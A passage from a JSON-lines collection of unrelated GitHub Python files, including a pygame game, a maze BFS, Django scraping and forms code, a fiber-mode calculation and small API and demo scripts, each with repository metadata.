levels[activelevel].fbullet.add(bullet)\n lastFiring = 0\n background.fill(levels[activelevel].levelcolor)\n levels[activelevel].draw(background)\n screen.blit(background,(0,0))\n \n screen.blit(scorefont.render(\"Score \" + str(score[0]),0,(0,0,0)),(SCREENWIDTH/2-20,0))\n \n if levels[activelevel].update(score):\n activelevel += 1\n if activelevel >= len(levels):\n done = True\n won = True\n \n clock.tick(30)\n lastFiring += clock.get_time()\n \n #drawnRects.draw(background)\n \n pygame.display.flip()\n\n#endloop\nwhile won:\n \n if pygame.event.peek():\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n won = False;\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n won = False\n background.fill((255,255,255))\n screen.blit(background,(0,0))\n screen.blit(scorefont.render(\"Your final score was \" + str(score[0]),1,(0,0,0)),(SCREENWIDTH/2-150,SCREENHEIGHT/2 -60))\n screen.blit(scorefont.render(\"YOU WIN!\",1,(0,0,0)),(SCREENWIDTH/2-100,0))\n screen.blit(scorefont.render(\"Press ESC to end\", 1,(0,0,0)),(SCREENWIDTH/2-100,400))\n pygame.display.flip()\n\n\npygame.quit()\n ", "repo_name": "montepy/PyBullet", "sub_path": "PyBulletPrimaryTesting/PyBulletPrimaryTesting/PyBulletPrimaryTesting.py", "file_name": "PyBulletPrimaryTesting.py", "file_ext": "py", "file_size_in_byte": 3436, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pygame.init", "line_number": 6, "usage_type": "call"}, {"api_name": "pygame.display.set_mode", "line_number": 10, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 10, "usage_type": "attribute"}, 
{"api_name": "pygame.display.set_caption", "line_number": 11, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 11, "usage_type": "attribute"}, {"api_name": "pygame.key.set_repeat", "line_number": 12, "usage_type": "call"}, {"api_name": "pygame.key", "line_number": 12, "usage_type": "attribute"}, {"api_name": "pygame.Surface", "line_number": 13, "usage_type": "call"}, {"api_name": "Level.Level", "line_number": 15, "usage_type": "call"}, {"api_name": "pygame.time.Clock", "line_number": 20, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 20, "usage_type": "attribute"}, {"api_name": "pygame.font.Font", "line_number": 23, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 23, "usage_type": "attribute"}, {"api_name": "pygame.event.peek", "line_number": 27, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 27, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 28, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 28, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 29, "usage_type": "attribute"}, {"api_name": "pygame.KEYDOWN", "line_number": 31, "usage_type": "attribute"}, {"api_name": "pygame.K_ESCAPE", "line_number": 32, "usage_type": "attribute"}, {"api_name": "pygame.K_LSHIFT", "line_number": 34, "usage_type": "attribute"}, {"api_name": "pygame.K_UP", "line_number": 36, "usage_type": "attribute"}, {"api_name": "pygame.K_DOWN", "line_number": 38, "usage_type": "attribute"}, {"api_name": "pygame.K_RIGHT", "line_number": 40, "usage_type": "attribute"}, {"api_name": "pygame.K_LEFT", "line_number": 42, "usage_type": "attribute"}, {"api_name": "pygame.KEYUP", "line_number": 44, "usage_type": "attribute"}, {"api_name": "pygame.key.get_pressed", "line_number": 45, "usage_type": "call"}, {"api_name": "pygame.key", "line_number": 45, "usage_type": "attribute"}, {"api_name": "pygame.K_UP", "line_number": 45, "usage_type": "attribute"}, {"api_name": "pygame.K_DOWN", "line_number": 45, "usage_type": "attribute"}, {"api_name": "pygame.key.get_pressed", "line_number": 47, "usage_type": "call"}, {"api_name": "pygame.key", "line_number": 47, "usage_type": "attribute"}, {"api_name": "pygame.K_RIGHT", "line_number": 47, "usage_type": "attribute"}, {"api_name": "pygame.K_LEFT", "line_number": 47, "usage_type": "attribute"}, {"api_name": "pygame.K_LSHIFT", "line_number": 49, "usage_type": "attribute"}, {"api_name": "pygame.key.get_pressed", "line_number": 52, "usage_type": "call"}, {"api_name": "pygame.key", "line_number": 52, "usage_type": "attribute"}, {"api_name": "pygame.K_SPACE", "line_number": 52, "usage_type": "attribute"}, {"api_name": "pygame.display.flip", "line_number": 74, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 74, "usage_type": "attribute"}, {"api_name": "pygame.event.peek", "line_number": 79, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 79, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 80, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 80, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 81, "usage_type": "attribute"}, {"api_name": "pygame.KEYDOWN", "line_number": 83, "usage_type": "attribute"}, {"api_name": "pygame.K_ESCAPE", "line_number": 84, "usage_type": "attribute"}, {"api_name": "pygame.display.flip", "line_number": 91, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 91, "usage_type": "attribute"}, {"api_name": 
"pygame.quit", "line_number": 94, "usage_type": "call"}]}
+{"seq_id": "24674712233", "text": "import collections\r\nwall, clear, goal = 0, 1, 9 \r\nwidth,height=map(int,input().split())\r\n\r\ndef bfs(maze, start):\r\n queue = collections.deque()\r\n queue.append(start)\r\n seen = set([start])\r\n while queue:\r\n path = queue.popleft()\r\n print(path)\r\n x, y = path\r\n if maze[y][x] == goal:\r\n # print(maze[y][x])\r\n return True\r\n for x2, y2 in ((x+1,y), (x-1,y), (x,y+1), (x,y-1)):\r\n if ( 0 <= x2 < width and \r\n 0 <= y2 < height and \r\n maze[y2][x2] != wall and \r\n (x2, y2) not in seen): \r\n queue.append( (x2, y2))\r\n seen.add((x2, y2))\r\n return False\r\n\r\nmat=[list(map(int,input().split())) for i in range(height)]\r\n\r\nans = 0 if mat[0][0]==0 else bfs(mat,(0,0)) #check if start(0,0) is walkable or not if not return False else Run BFS\r\nprint(ans) #if path exist it will print True else prints False\r\n\r\n\r\n", "repo_name": "Rahul-p28/AI_LAB", "sub_path": "maze.py", "file_name": "maze.py", "file_ext": "py", "file_size_in_byte": 951, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "collections.deque", "line_number": 6, "usage_type": "call"}]}
+{"seq_id": "24753402838", "text": "from pyspark import SparkContext\nfrom pyspark.streaming import StreamingContext\nfrom pyspark.streaming.kafka import KafkaUtils\n\nsc = SparkContext(appName=\"PythonSparkStreamingKafka\")\nsc.setLogLevel(\"WARN\")\n\nssc = StreamingContext(sc, 10)\ndirectKafkaStream = KafkaUtils.createDirectStream(ssc, [\"quickstart-events\"], {\"metadata.broker.list\": \"192.168.33.13:9092\"})\n\ndirectKafkaStream.map(lambda x: x[1]).pprint()\n\n\n#Starting Spark context\nssc.start()\nssc.awaitTermination()\n", "repo_name": "Manal-98/Data-mining", "sub_path": "spark-streaming-kafka.py", "file_name": "spark-streaming-kafka.py", "file_ext": "py", "file_size_in_byte": 473, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pyspark.SparkContext", "line_number": 5, "usage_type": "call"}, {"api_name": "pyspark.streaming.StreamingContext", "line_number": 8, "usage_type": "call"}, {"api_name": "pyspark.streaming.kafka.KafkaUtils.createDirectStream", "line_number": 9, "usage_type": "call"}, {"api_name": "pyspark.streaming.kafka.KafkaUtils", "line_number": 9, "usage_type": "name"}]}
+{"seq_id": "26323773735", "text": "import requests\nfrom bs4 import BeautifulSoup\nfrom decimal import Decimal\nimport html\nfrom assistant.models import Product, Photo, Category\nfrom assistant.utils import get_file_ext, make_filename, get_and_save_image\nfrom currency.models import Currency\n\n\nclass ProductTemplate:\n\n def __init__(self, title, price, images, text, vendor_id, currency_id, available):\n self.title = title\n self.price = price\n self.images = images\n self.text = text\n self.vendor_id = vendor_id\n self.currency_id = currency_id\n self.available = available\n\n\nclass BaseHandler:\n headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 '\n '(KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36'}\n category = Category.objects.get(title='TEST CATEGORY')\n\n def __init__(self, sourse):\n self.sourse = sourse\n self.content = None\n self.products = []\n self._set_currencies()\n self.vendor_name = sourse.rules['vandor_name'].lower()\n\n def _set_currencies(self):\n self.currencies = {i.code.upper(): i.id for i in Currency.objects.all()}\n\n def download_content(self):\n r = requests.get(self.sourse.url, headers=self.headers)\n if r.status_code == 200:\n self.content = r.text\n else:\n print('[ERROR] response status: {}'.format(r.status_code))\n\n def prepare_content(self):\n raise NotImplementedError()\n\n @staticmethod\n def decimal_or_none(digit_text):\n try:\n return Decimal(digit_text)\n except:\n return None\n\n @staticmethod\n def _download_image(path, product_pk):\n ext = get_file_ext(path)\n filename = make_filename(product_pk, ext)\n get_and_save_image(path, filename)\n return filename\n\n @staticmethod\n def _update_product(product, product_in_db):\n product_in_db.availability_prom = '+' if product.available else '-'\n product_in_db.active = product.available or False\n product_in_db.price = product.price\n product_in_db.save(update_fields=('availability_prom', 'price', 'active'))\n\n def _create_product(self, product):\n new_product = Product()\n new_product.category = self.category\n new_product.title = product.title\n new_product.price = product.price\n new_product.text = product.text\n new_product.vendor_id = product.vendor_id\n new_product.vendor_name = self.vendor_name\n new_product.currency_id = product.currency_id\n new_product.availability_prom = '+' if product.available else '-'\n new_product.active = product.available\n try:\n new_product.image = self._download_image(product.images[0], new_product.pk)\n except IndexError:\n pass\n new_product.save()\n\n try:\n for i in product.images[1:]:\n image = Photo()\n image.product = new_product\n image.image = self._download_image(i, new_product.pk)\n image.save()\n except IndexError:\n pass\n\n def create_or_update(self):\n for product in self.products:\n products_in_db = Product.objects.filter(\n vendor_id=product.vendor_id,\n vendor_name=self.vendor_name\n )\n if len(products_in_db) > 0:\n for product_in_db in products_in_db:\n self._update_product(product, product_in_db)\n else:\n self._create_product(product)\n\n def parse(self):\n print('[INFO] Parsing {}'.format(self.vendor_name))\n self.download_content()\n\n if self.content:\n self.prepare_content()\n else:\n print('[ERROR] Content is None in {}'.format(self.vendor_name))\n return False\n\n self.create_or_update()\n\n\nclass YMLYandexCatalogHandler(BaseHandler):\n\n def prepare_content(self):\n soup = BeautifulSoup(self.content, 'html5lib')\n mapping = self.sourse.rules['mapping']\n reset_currency = 
self.sourse.rules.get('reset_currency_code', False)\n\n for offer in soup.find_all(self.sourse.rules['cycle_tag']):\n try:\n product = ProductTemplate(\n title=html.unescape(offer.find(mapping['get_title']).text),\n price=self.decimal_or_none(offer.find(mapping['get_price']).text),\n images=[i.text for i in offer.find_all(mapping['get_image'])],\n text=html.unescape(offer.find(mapping['get_text']).text),\n vendor_id=offer.find(mapping['get_vendor_code']).text,\n currency_id=self.currencies.get(reset_currency.upper()) if reset_currency else self.currencies.get(\n offer.find(mapping['get_currency']).text.upper()),\n available=True if offer[mapping['get_available']] == 'true' else False,\n )\n self.products.append(product)\n except:\n print('[ERROR] Parsing error in VitanHandler')\n", "repo_name": "vintkor/django_ppf", "sub_path": "spider/utils/handlers.py", "file_name": "handlers.py", "file_ext": "py", "file_size_in_byte": 5132, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "assistant.models.Category.objects.get", "line_number": 25, "usage_type": "call"}, {"api_name": "assistant.models.Category.objects", "line_number": 25, "usage_type": "attribute"}, {"api_name": "assistant.models.Category", "line_number": 25, "usage_type": "name"}, {"api_name": "currency.models.Currency.objects.all", "line_number": 35, "usage_type": "call"}, {"api_name": "currency.models.Currency.objects", "line_number": 35, "usage_type": "attribute"}, {"api_name": "currency.models.Currency", "line_number": 35, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 38, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 50, "usage_type": "call"}, {"api_name": "assistant.utils.get_file_ext", "line_number": 56, "usage_type": "call"}, {"api_name": "assistant.utils.make_filename", "line_number": 57, "usage_type": "call"}, {"api_name": "assistant.utils.get_and_save_image", "line_number": 58, "usage_type": "call"}, {"api_name": "assistant.models.Product", "line_number": 69, "usage_type": "call"}, {"api_name": "assistant.models.Photo", "line_number": 87, "usage_type": "call"}, {"api_name": "assistant.models.Product.objects.filter", "line_number": 96, "usage_type": "call"}, {"api_name": "assistant.models.Product.objects", "line_number": 96, "usage_type": "attribute"}, {"api_name": "assistant.models.Product", "line_number": 96, "usage_type": "name"}, {"api_name": "bs4.BeautifulSoup", "line_number": 122, "usage_type": "call"}, {"api_name": "html.unescape", "line_number": 129, "usage_type": "call"}, {"api_name": "html.unescape", "line_number": 132, "usage_type": "call"}]}
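The handler above drives its extraction from a mapping dict of tag names stored in the source's rules. A toy, self-contained illustration of that pattern — the feed snippet and mapping values here are invented, and html.parser stands in for the record's html5lib:

```python
from bs4 import BeautifulSoup

xml = """<offer available="true">
  <name>Widget</name><price>19.90</price><currency>UAH</currency>
</offer>"""
mapping = {"get_title": "name", "get_price": "price", "get_currency": "currency"}

offer = BeautifulSoup(xml, "html.parser").find("offer")
title = offer.find(mapping["get_title"]).text
price = offer.find(mapping["get_price"]).text
available = offer["available"] == "true"
print(title, price, available)  # Widget 19.90 True
```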
+{"seq_id": "5107361753", "text": "import numpy as np\nfrom fiber import fiber\nfrom stretchmesh import stretchmesh\nfrom scipy.special import jv, kv\nfrom scipy.optimize import fsolve\nfrom contourmode import contour\n\nnco = 2.5\nncl = 1.5\nr = 0.3\nwl = 1\nside = 0.2\n\ndx = 0.002\ndy = 0.002\n\nx, y, eps = fiber([nco, ncl], [r], side, dx, dy)\nx, y = stretchmesh(x, y, [96, 0, 96, 0], [4, 1, 4, 1])\n\nV = 2 * np.pi * r / wl * np.sqrt(nco**2 - ncl**2)\n\n\ndef spam(U):\n return nco ** 2 * jv(1, U) / (U * jv(0, U)) + \\\n ncl ** 2 * kv(1, np.sqrt(V ** 2 - U ** 2)) / \\\n (np.sqrt(V ** 2 - U ** 2) * kv(0, np.sqrt(V ** 2 - U ** 2)))\n\n\nU = fsolve(spam, 3.2).item()\n\nW = np.sqrt(V**2 - U**2)\nneff0 = np.sqrt(nco**2 - (U / (2 * np.pi * r / wl))**2)\n\n\nx = x.reshape(-1, 1)\ny = y.reshape(1, -1)\nrho = np.sqrt(np.dot(x**2, np.ones(y.shape)) + np.dot(np.ones(x.shape), y**2))\n\nsinphi = np.divide(np.dot(np.ones(x.shape), y), rho)\ncosphi = np.divide(np.dot(x, np.ones(y.shape)), rho)\n\nHx0 = np.zeros(rho.shape)\nHy0 = np.zeros(rho.shape)\n\nfor index, value in np.ndenumerate(rho):\n if value == 0:\n Hx0[index] = 0\n Hy0[index] = 0\n elif value < r:\n Hx0[index] = -sinphi[index] * jv(1, U * value / r) / jv(1, U)\n Hy0[index] = cosphi[index] * jv(1, U * value / r) / jv(1, U)\n elif value > r:\n Hx0[index] = -sinphi[index] * kv(1, W * value / r) / kv(1, W)\n Hy0[index] = cosphi[index] * kv(1, W * value / r) / kv(1, W)\n\nhxmax = np.amax(abs(Hx0))\nhymax = np.amax(abs(Hy0))\nHx0 = Hx0 / max(hxmax, hymax)\nHy0 = Hy0 / max(hxmax, hymax)\n\nx = x.flatten()\ny = y.flatten()\n", "repo_name": "alikaikai/myfdm", "sub_path": "examples/fiber_tm_exact.py", "file_name": "fiber_tm_exact.py", "file_ext": "py", "file_size_in_byte": 1562, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "fiber.fiber", "line_number": 17, "usage_type": "call"}, {"api_name": "stretchmesh.stretchmesh", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 20, "usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 20, "usage_type": "call"}, {"api_name": "scipy.special.jv", "line_number": 24, "usage_type": "call"}, {"api_name": "scipy.special.kv", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 26, "usage_type": "call"}, {"api_name": "scipy.special.kv", "line_number": 26, "usage_type": "call"}, {"api_name": "scipy.optimize.fsolve", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 32, "usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.divide", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.divide", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 43, 
"usage_type": "call"}, {"api_name": "numpy.ndenumerate", "line_number": 45, "usage_type": "call"}, {"api_name": "scipy.special.jv", "line_number": 50, "usage_type": "call"}, {"api_name": "scipy.special.jv", "line_number": 51, "usage_type": "call"}, {"api_name": "scipy.special.kv", "line_number": 53, "usage_type": "call"}, {"api_name": "scipy.special.kv", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.amax", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.amax", "line_number": 57, "usage_type": "call"}]}
+{"seq_id": "554706284", "text": "from setuptools import setup, find_packages\nimport os\n\nversion = '1.6.5.dev0'\n\ntests_require = [\n 'ftw.testbrowser',\n 'ftw.testing',\n 'plone.app.testing',\n]\n\nsetup(\n name='ftw.colorbox',\n version=version,\n description=\"An image gallery for Plone using ColorBox\",\n long_description='{0}\\n{1}'.format(\n open(\"README.rst\").read(),\n open(os.path.join(\"docs\", \"HISTORY.txt\")).read()\n ),\n\n classifiers=[\n 'Framework :: Plone',\n 'Framework :: Plone :: 4.3',\n 'Framework :: Plone :: 5.1',\n 'Programming Language :: Python',\n 'Topic :: Software Development :: Libraries :: Python Modules',\n ],\n\n keywords='ftw colorbox',\n author='4teamwork AG',\n author_email='mailto:info@4teamwork.ch',\n url='https://github.com/4teamwork/ftw.colorbox',\n license='GPL2',\n\n packages=find_packages(exclude=['ez_setup']),\n namespace_packages=['ftw'],\n include_package_data=True,\n zip_safe=False,\n\n install_requires=[\n 'ftw.upgrade',\n 'setuptools',\n 'Plone',\n 'plone.api',\n ],\n\n tests_require=tests_require,\n extras_require=dict(tests=tests_require),\n\n entry_points=\"\"\"\n # -*- Entry points: -*-\n [z3c.autoinclude.plugin]\n target = plone\n \"\"\",\n)\n", "repo_name": "4teamwork/ftw.colorbox", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 1276, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "setuptools.setup", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path", "line_number": 18, "usage_type": "attribute"}, {"api_name": "setuptools.find_packages", "line_number": 35, "usage_type": "call"}]}
+{"seq_id": "10251211992", "text": "from multiprocessing import Process\n\nimport os\nimport time\n\n\ndef info(title):\n print(title)\n print('module name:', __name__)\n if hasattr(os, 'getppid'):\n print('parent process: {}'.format(os.getppid()))\n print('process id: {}'.format(os.getpid()))\n\n\ndef f(name):\n info('function f')\n time.sleep(2)\n print('hello {}'.format(name))\n\n\nif __name__ == '__main__':\n info('main line')\n p = Process(target=f, args=('bob',))\n p.start()\n p.join()\n", "repo_name": "perrydzhu/pydem0", "sub_path": "sock/multiproc.py", "file_name": "multiproc.py", "file_ext": "py", "file_size_in_byte": 477, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.getppid", "line_number": 11, "usage_type": "call"}, {"api_name": "os.getpid", "line_number": 12, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 17, "usage_type": "call"}, {"api_name": "multiprocessing.Process", "line_number": 23, "usage_type": "call"}]}
+{"seq_id": "15886466092", "text": "\"\"\"from turtle import Turtle, Screen\ntimmy = Turtle()\nprint(timmy)\ntimmy.shape(\"turtle\")\ntimmy.fd(100)\ntimmy.color(\"red\")\n\nmy_screen = Screen()\nprint(my_screen.canvheight)\n\nmy_screen.exitonclick()\"\"\"\n\nimport prettytable\n\nfrom prettytable import PrettyTable\ntable = PrettyTable()\nprint(table)\n#table.add_row([\"Name\",1,2])\ntable.add_column(\"age\",[11,22])\ntable.add_column(\"Name\",[11,22])\ntable.align =\"r\"\nprint(table)", "repo_name": "Harini0924/day-16-start", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 416, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "prettytable.PrettyTable", "line_number": 16, "usage_type": "call"}]}
+{"seq_id": "281305449", "text": "import os\nimport yaml\nimport numpy as np\nimport random\n\nCONFIG_PATH = 'config/'\n\ndef smooth_curve(x): #사용 x\n window_len = 101\n s = np.r_[x[window_len-1:0:-1], x, x[-1:-window_len:-1]]\n w = np.kaiser(window_len, 2)\n y = np.convolve(w/w.sum(), s, mode='valid')\n return y[50:len(y)-50]\n\n\ndef shuffle_dataset(x, t): #사용 보류\n shuffled = list(zip(x, t))\n random.shuffle(shuffled)\n x = [e[0] for e in shuffled]\n t = [e[0] for e in shuffled]\n\n return x, t\n\ndef load_config(config_name):\n with open(os.path.join(CONFIG_PATH, config_name)) as file:\n config = yaml.safe_load(file)\n return config", "repo_name": "GwakJiho/DeepLearning", "sub_path": "cifar10/utils/util.py", "file_name": "util.py", "file_ext": "py", "file_size_in_byte": 640, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.r_", "line_number": 10, "usage_type": "attribute"}, {"api_name": "numpy.kaiser", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.convolve", "line_number": 12, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path", "line_number": 25, "usage_type": "attribute"}, {"api_name": "yaml.safe_load", "line_number": 26, "usage_type": "call"}]}
+{"seq_id": "74813081766", "text": "from django import forms\n\nfrom account.models import Student\nfrom .models import *\n\n\nclass JudgmentFactsForm(forms.ModelForm):\n\n class Meta:\n model = JudgmentFacts\n fields = ['name', 'team_length', 'fact_max_time', 'status']\n\n\nclass FactForm(forms.ModelForm):\n\n CORRECT_ANSWER = Choices(\n (True, 'Verdadeiro'),\n (False, 'Falso'),\n )\n correct_answer = forms.ChoiceField(choices=CORRECT_ANSWER, widget=forms.RadioSelect())\n\n class Meta:\n model = Fact\n fields = ['order', 'statement', 'topic_group', 'correct_answer']\n\n def save(self, commit=True, **kwargs):\n jf = JudgmentFacts.objects.get(id=kwargs['jf_id'])\n data = self.data\n return Fact.objects.create(\n order=data['order'], statement=data['statement'], topic_group=data['topic_group'],\n correct_answer=data['correct_answer'], judgment_facts=jf\n )\n\n\nclass TeamForm(forms.ModelForm):\n\n def __init__(self, *args, **kwargs):\n super(TeamForm, self).__init__(*args, **kwargs)\n self.fields['member'].queryset = Student.objects.all().exclude(pk__in=Team.objects.all()).order_by('user__name')\n\n class Meta:\n model = Team\n fields = ['name', 'member']\n", "repo_name": "CarolClara/Julgamento-de-Fatos", "sub_path": "judgment_facts/forms.py", "file_name": "forms.py", "file_ext": "py", "file_size_in_byte": 1238, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.forms.ModelForm", "line_number": 7, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 7, "usage_type": "name"}, {"api_name": "django.forms.ModelForm", "line_number": 14, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 14, "usage_type": "name"}, {"api_name": "django.forms.ChoiceField", "line_number": 20, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 20, "usage_type": "name"}, {"api_name": "django.forms.RadioSelect", "line_number": 20, "usage_type": "call"}, {"api_name": "django.forms.ModelForm", "line_number": 35, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 35, "usage_type": "name"}, {"api_name": "account.models.Student.objects.all", "line_number": 39, "usage_type": "call"}, {"api_name": "account.models.Student.objects", "line_number": 39, "usage_type": "attribute"}, {"api_name": "account.models.Student", "line_number": 39, "usage_type": "name"}]}
+{"seq_id": "12126962479", "text": "import requests\nimport json\n\nlatitude = 0.0\nlongitude = 0.0\n\ndef get_Position():\n global latitude,longitude\n api_endpoint2 =\"http://api.open-notify.org/iss-now.json\"\n\n response = requests.get(api_endpoint2)\n print(response.status_code)\n status =response.raise_for_status()\n print(status)\n ctype =response.headers['content-type']\n print(ctype)\n\n if response.status_code == 200 :\n print(\"success\")\n data = response.json()\n print(json.dumps(data, indent=4))\n position = data[\"iss_position\"]\n latitude = data[\"iss_position\"][\"latitude\"]\n longitude = data[\"iss_position\"][\"longitude\"]\n pos = (position,latitude,longitude)\n print(pos)\n else :\n print(\"something went wrong!\")\n \n\ndef get_SunriseSunset(lat ,long):\n api_endpoint2 =\"https://api.sunrise-sunset.org/json\"\n payload ={\n \"lat\" : lat ,\n \"lng\" : long\n }\n response = requests.get(api_endpoint2,params=payload)\n\n print(response.status_code)\n status =response.raise_for_status()\n ctype =response.headers['content-type']\n print(ctype)\n\n if response.status_code == 200 :\n data = response.json()\n print(json.dumps(data, indent=4))\n print(data)\n sunrise = data[\"results\"][\"sunrise\"]\n sunset = data[\"results\"][\"sunset\"]\n print(\"sunrise time is : \" ,sunrise )\n print(\"sunset time is : \" ,sunset )\n else :\n print(\"something went wrong!\")\n\n\nget_Position()\nget_SunriseSunset(latitude,longitude)", "repo_name": "yogeshdhameliya6013/python", "sub_path": "api/sunrisesunset.py", "file_name": "sunrisesunset.py", "file_ext": "py", "file_size_in_byte": 1528, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "requests.get", "line_number": 11, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 21, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 37, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 46, "usage_type": "call"}]}
+{"seq_id": "42724496558", "text": "from django.contrib import admin\nfrom django.contrib.auth import login, logout\nfrom django.urls import include, path\n\n\nadmin.autodiscover()\n\nurlpatterns = (\n path(\"admin/\", admin.site.urls),\n path(\n \"registration/login/\",\n login,\n name=\"login\",\n ),\n path(\n \"registration/logout/\",\n logout,\n name=\"logout\",\n ),\n path(\"\", include(\"blog.urls\")),\n)\n", "repo_name": "lambdalisue/django-author", "sub_path": "tests/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 405, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 36, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.contrib.admin.autodiscover", "line_number": 6, "usage_type": "call"}, {"api_name": "django.contrib.admin", "line_number": 6, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "django.contrib.admin.site", "line_number": 9, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 9, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "django.contrib.auth.login", "line_number": 12, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 15, "usage_type": "call"}, {"api_name": "django.contrib.auth.logout", "line_number": 17, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 20, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 20, "usage_type": "call"}]}
+{"seq_id": "38512938406", "text": "#! /usr/bin/env python\n# -*- coding: utf-8 -*-\nimport os\nimport datetime\nimport urllib.request\nimport urllib.error\nimport urllib.parse\nimport csv\nimport json\nimport codecs\nimport lxml\nfrom lxml import html\nimport yaml\n\n\ndef convert_to_datetime_date(date):\n \"\"\"Convert date to datetime.date\n\n Params:\n date (logring): \"Nov 15 '16\"\n Return:\n (datetime.date): datetime.date(2016,11,15)\n\n >>> convert_to_datetime_date(\"Nov 15 '16\")\n datetime.date(2016, 11, 15)\n \"\"\"\n date = date.split()\n month_name = ['January', 'February', 'March', 'April', 'May', 'June',\n 'July', 'Augulog', 'September', 'October', 'November', 'December']\n month_name = [x[:3] for x in month_name]\n month = month_name.index(date[0]) + 1\n date[2] = date[2].replace(\"'\", '20')\n return datetime.date(year=int(date[2]), month=month, day=int(date[1]))\n\n\ndef start_request(url):\n request = urllib.request.urlopen(url)\n # process handle exception\n response = request.read()\n return response\n\n\ndef log_data(app, version, date, change_log, database):\n if os.path.exists(database):\n mode = 'a'\n else:\n mode = 'w'\n if change_log == '':\n change_log = 'Rand'\n fields = ['iOS', date, '1', app, '1', '1',\n 'Version', 'Rand', version, change_log]\n fields_name = ['Platform', 'Date', 'App ID', 'App Name', 'Publisher ID',\n 'Publisher Name', 'Update Type', 'Previous Value', 'New Value', 'Notes']\n\n stream = open(database, mode)\n writer = csv.writer(stream)\n if mode == 'w':\n writer.writerow(fields_name)\n writer.writerow(fields)\n\n\ndef format_change_log(log):\n \"\"\"Reformat application news log to desired form.\n\n 